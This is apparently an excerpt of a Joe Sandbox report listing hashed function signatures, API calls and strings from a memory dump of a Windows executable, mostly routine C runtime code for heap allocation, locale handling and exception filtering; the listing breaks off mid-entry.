                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID:
                                                                                  • API String ID: 3215553584-0
                                                                                  • Opcode ID: b775fb37558cbe0d9f685a5aed90acce8f5692ab35a844819172b9af688f5e48
                                                                                  • Instruction ID: ce8d32aed7833ccfd21bd678f78c3d671afda4b8f3c3e13967cc34c01a6e8ca1
                                                                                  • Opcode Fuzzy Hash: b775fb37558cbe0d9f685a5aed90acce8f5692ab35a844819172b9af688f5e48
                                                                                  • Instruction Fuzzy Hash: 5B119D3A919642E2F200FB18A446129F3A1FB90340F8644B5EA4D5B692CF3CE810BB21
                                                                                  APIs
                                                                                  • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF73A3F7F24
                                                                                    • Part of subcall function 00007FF73A3F9E78: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF73A3F9E80
                                                                                    • Part of subcall function 00007FF73A3F9E78: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF73A3F9E85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                  • String ID:
                                                                                  • API String ID: 1208906642-0
                                                                                  • Opcode ID: 224b13c04430447bb356dc3f0809f92e7c82e594cc02aa9ed2c5e200abf5342b
                                                                                  • Instruction ID: 559d558945cf9b755a4717ce6d5789302bc927ca1c14d9d9eb069c196bd9b8e3
                                                                                  • Opcode Fuzzy Hash: 224b13c04430447bb356dc3f0809f92e7c82e594cc02aa9ed2c5e200abf5342b
                                                                                  • Instruction Fuzzy Hash: B7E0B65CD2F34376FEA83A2555432F8D2804F22304FD024FEE51E521839D2D304A7632
                                                                                  APIs
                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00007FF73A404B06,?,?,0000475671667E7C,00007FF73A4006B1,?,?,?,?,00007FF73A40A0B6,?,?,00000000), ref: 00007FF73A406329
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocHeap
                                                                                  • String ID:
                                                                                  • API String ID: 4292702814-0
                                                                                  • Opcode ID: 3297627f840d2d8a0acd794a5d79d3fc058ea66c42947bb30e921bb7862556ae
                                                                                  • Instruction ID: 870ae19b91a88fd60f0f6e7cc84c9a1d2dda875ac3fc82b2f5c0149e2569d7d7
                                                                                  • Opcode Fuzzy Hash: 3297627f840d2d8a0acd794a5d79d3fc058ea66c42947bb30e921bb7862556ae
                                                                                  • Instruction Fuzzy Hash: 99F04F4CB0A24675FE54F75E56132B9C6801F85780FCA04B4C90F462C1EEACE4817272
                                                                                  APIs
                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF73A40A09D,?,?,00000000,00007FF73A400CCF,?,?,?,00007FF73A40194B,?,?,?,00007FF73A401841), ref: 00007FF73A408E8E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocHeap
                                                                                  • String ID:
                                                                                  • API String ID: 4292702814-0
                                                                                  • Opcode ID: 7d8b04491be02a6a6a54ba2ac2cf4b3de713a8671e022013d4177b5f51218a88
                                                                                  • Instruction ID: 96946aa2d045a4dc24276a76943ea947f014e3eb570c609af6f5f4510afdece7
                                                                                  • Opcode Fuzzy Hash: 7d8b04491be02a6a6a54ba2ac2cf4b3de713a8671e022013d4177b5f51218a88
                                                                                  • Instruction Fuzzy Hash: 4CF08918F0D20665FAA4B7696A43675E2405FC47B0FCA0AF0ED2EC52C1DE6CF4407172
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 2591520935-3303519982
                                                                                  • Opcode ID: 4f671ca00f56fc9bf8997cbef9bac339960b0da77d1a639bb5ca6f39e128ec38
                                                                                  • Instruction ID: 3cf87418751feeea65d7aded6c0fc92bdbd568aa6e95fae6f2cfb65142164f39
                                                                                  • Opcode Fuzzy Hash: 4f671ca00f56fc9bf8997cbef9bac339960b0da77d1a639bb5ca6f39e128ec38
                                                                                  • Instruction Fuzzy Hash: 6471796AB08602A9FB10FB68D4536B8F3A0AF44B44F864075CA1D43791EF3DA465F322
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                  • String ID: utf8$|~fqVG
                                                                                  • API String ID: 3069159798-752275611
                                                                                  • Opcode ID: d46c3db5fd79884ae430bdd4407c5728a58e5621258412781129b8267518e870
                                                                                  • Instruction ID: ed9bdfdb6b5dea84648dbd58ba6b3abd434b6162a3630daef4917bc8f59c7951
                                                                                  • Opcode Fuzzy Hash: d46c3db5fd79884ae430bdd4407c5728a58e5621258412781129b8267518e870
                                                                                  • Instruction Fuzzy Hash: 3691CF3AA08742A5FB20FB29D4032B9E7A0EB44B80F864175CA5C47785DF3CE561F322
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 1239891234-3303519982
                                                                                  • Opcode ID: b756a912aeb3b57a49614e42f217d9f36913244dab77649a3db67ba06f605164
                                                                                  • Instruction ID: 332b6330694dc1bb6213a0792917051d86349efc1c6fa9152cafba1cae9df281
                                                                                  • Opcode Fuzzy Hash: b756a912aeb3b57a49614e42f217d9f36913244dab77649a3db67ba06f605164
                                                                                  • Instruction Fuzzy Hash: C131B43A618F8196EB24DF28E8412AEB3A0FB98754F910175EE8D43B54DF3CC145C710
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3140674995-0
                                                                                  • Opcode ID: c2016361b9a202e33e16e1aa200e640e5cdd72cb80c696406574d654a1428c77
                                                                                  • Instruction ID: 909ac8b86152ff03c6e1bcb65fdbc0d4b2c025499ff9244ba004446d2f997e09
                                                                                  • Opcode Fuzzy Hash: c2016361b9a202e33e16e1aa200e640e5cdd72cb80c696406574d654a1428c77
                                                                                  • Instruction Fuzzy Hash: D7316EB6619B829AFB649F64E8413EDB360FB94704F90407ADA4D47B94EF38D548C720
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 2933794660-3303519982
                                                                                  • Opcode ID: 175403f887a107761204df3119ca0200cdd13c37828f298386d6700f57525c95
                                                                                  • Instruction ID: e4745a6358af34455982f8d20072638055be90e3bd3ec83bb9f14a19c465536f
                                                                                  • Opcode Fuzzy Hash: 175403f887a107761204df3119ca0200cdd13c37828f298386d6700f57525c95
                                                                                  • Instruction Fuzzy Hash: AD11A026B14F0599FB00DF64E8492B873A0FB29718F810E31DE2D867A4DF7CD0589350
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 1791019856-3303519982
                                                                                  • Opcode ID: 8380d45a326b3d1e8aced02d63fd4f4030e7a97d598a3e3abbdea63c338b2f08
                                                                                  • Instruction ID: 84178fd4af4acf1b91cce72f96453e3e7bfe4b1f92a1fd59aeb8f0f83df827a4
                                                                                  • Opcode Fuzzy Hash: 8380d45a326b3d1e8aced02d63fd4f4030e7a97d598a3e3abbdea63c338b2f08
                                                                                  • Instruction Fuzzy Hash: 1361D27AA08542A6FB74EF18E4432B9F3A0FB84744F868175C75E83691DF3CE460A721
                                                                                  APIs
                                                                                  Strings
                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF73A3F7DF7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                  • API String ID: 389471666-631824599
                                                                                  • Opcode ID: d67c635758605ed6479ea3d4b4b08c5c799a1697d5db29fb57afd5ba643e8a04
                                                                                  • Instruction ID: 2e46266179389ec31793b063bdc9b8a2c598f6c091679556cfba4f2b2716661c
                                                                                  • Opcode Fuzzy Hash: d67c635758605ed6479ea3d4b4b08c5c799a1697d5db29fb57afd5ba643e8a04
                                                                                  • Instruction Fuzzy Hash: D0119436614B42A3F705AB26E6423B973A0FF14340F914079C65D42A60EF3CE474D760
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatInfoLocaleMessage
                                                                                  • String ID: !x-sys-default-locale
                                                                                  • API String ID: 4235545615-2729719199
                                                                                  • Opcode ID: e7fe5703d7bd3fcf55848a10b898419f89e1f05d712649635250529f0732eae7
                                                                                  • Instruction ID: b8bdc28d411367da1cdb89b0af7a6c7f637e204de7490c107125a6f7d96816ec
                                                                                  • Opcode Fuzzy Hash: e7fe5703d7bd3fcf55848a10b898419f89e1f05d712649635250529f0732eae7
                                                                                  • Instruction Fuzzy Hash: EF01D6B6B1878292FB109B12F40177AB7A1F7947C4F948076DA4D07A94CF3CD5049B10
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Info
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 1807457897-3303519982
                                                                                  • Opcode ID: 62ae6bd87548852ade8d5229f9a0f32bc70b976a0d0d75707d729192d03f9c5c
                                                                                  • Instruction ID: 5641923b9bd31664015394ecc650f0d659b4395c58394eac11b2c084a040b107
                                                                                  • Opcode Fuzzy Hash: 62ae6bd87548852ade8d5229f9a0f32bc70b976a0d0d75707d729192d03f9c5c
                                                                                  • Instruction Fuzzy Hash: 6812D326A19BC296E751DF3894062FDB3A4FB59748F469239EF8D43652DF38E180D310
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 0-3303519982
                                                                                  • Opcode ID: 573914a0e995c993a2e3199d19d82ec6dd91bce4a71a613a89b342e65d1811eb
                                                                                  • Instruction ID: a82d0b0d94af0c7a2d475444e31e6af897e36d80a4b71c321d538ff5bfb2b146
                                                                                  • Opcode Fuzzy Hash: 573914a0e995c993a2e3199d19d82ec6dd91bce4a71a613a89b342e65d1811eb
                                                                                  • Instruction Fuzzy Hash: 69512626B0868195FB20EB7AA8015AEFBA1FB807D4F954134EE4C27A85CF3CD005E701
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue$InfoLocale
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 673564084-3303519982
                                                                                  • Opcode ID: 33dce63c000d8f8ecba602ed5e9c9b01eb30c559286b4661bb96ac18289c62d7
                                                                                  • Instruction ID: 7ca18e6ff0025dcb6b66994d8fc0c35b954630366c732c843f51ee75d3ff0f61
                                                                                  • Opcode Fuzzy Hash: 33dce63c000d8f8ecba602ed5e9c9b01eb30c559286b4661bb96ac18289c62d7
                                                                                  • Instruction Fuzzy Hash: 3831D636A0828256FB64EB29E4433BAF391FB84744F858075DA5D83685DF3CE520E711
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: GetLocaleInfoEx
                                                                                  • API String ID: 2299586839-2904428671
                                                                                  • Opcode ID: a658af243d55a89f5ef705efa73716f0020930f295102f0f64cb9cdd66453038
                                                                                  • Instruction ID: ea5e217e8a487eb1bc844c2c8d818ea7bfcc4cce92e3e9230ee2c85fa105a98a
                                                                                  • Opcode Fuzzy Hash: a658af243d55a89f5ef705efa73716f0020930f295102f0f64cb9cdd66453038
                                                                                  • Instruction Fuzzy Hash: 1E01A728B08781A5F700EB5AB4014AAF761AF95FC0FA94075EE4D13765CE7CD5419750
                                                                                  APIs
                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF73A4066E7,?,?,?,?,?,?,?,?,00000000,00007FF73A40DAE4), ref: 00007FF73A4063D3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumLocalesSystem
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 2099609381-3303519982
                                                                                  • Opcode ID: 6624756bf7cade8dc1123afc4cca3197e7e1b61b4bdd0de2c75fdcf2745a3b96
                                                                                  • Instruction ID: 56e54e5261d587271c5401a3a49970b27b8fde3b81ad46bb2c2187f03e94029e
                                                                                  • Opcode Fuzzy Hash: 6624756bf7cade8dc1123afc4cca3197e7e1b61b4bdd0de2c75fdcf2745a3b96
                                                                                  • Instruction Fuzzy Hash: 85F08179714B4592F700EB19F8825A9A361EB98780F958075DA0D83364DF3CD451E700
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                  • String ID:
                                                                                  • API String ID: 15204871-0
                                                                                  • Opcode ID: 3399ca020fd9c3d0a4c647ae8a4c7378a3b1d81ee0c34c820329e66b1fe6482f
                                                                                  • Instruction ID: 2581a75e3f2e07af8f8fdcc7f204f92415a35217db594432b8c8fdbfe704019e
                                                                                  • Opcode Fuzzy Hash: 3399ca020fd9c3d0a4c647ae8a4c7378a3b1d81ee0c34c820329e66b1fe6482f
                                                                                  • Instruction Fuzzy Hash: 37B1AC77604B888BEB55DF2DC842368BBA0F780B48F1A8871DB5D837A5CB39D851E711
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32 ref: 00007FF73A4083E5
                                                                                    • Part of subcall function 00007FF73A4062D4: HeapAlloc.KERNEL32(?,?,00000000,00007FF73A404B06,?,?,0000475671667E7C,00007FF73A4006B1,?,?,?,?,00007FF73A40A0B6,?,?,00000000), ref: 00007FF73A406329
                                                                                    • Part of subcall function 00007FF73A405CE8: HeapFree.KERNEL32(?,?,00007FF73A40194B,00007FF73A40CF26,?,?,?,00007FF73A40D2A3,?,?,00000000,00007FF73A40D7E1,?,?,?,00007FF73A40D713), ref: 00007FF73A405CFE
                                                                                    • Part of subcall function 00007FF73A405CE8: GetLastError.KERNEL32(?,?,00007FF73A40194B,00007FF73A40CF26,?,?,?,00007FF73A40D2A3,?,?,00000000,00007FF73A40D7E1,?,?,?,00007FF73A40D713), ref: 00007FF73A405D08
                                                                                    • Part of subcall function 00007FF73A40F210: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73A40F243
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 916656526-3303519982
                                                                                  • Opcode ID: 31db45415bd8b84a699b03de4afdfbdb6800616cd27cfa35523224e36fc03502
                                                                                  • Instruction ID: 4af58d960a1d18c09ba3cd736cbd853f48392c213a20624b8b42f678aade700c
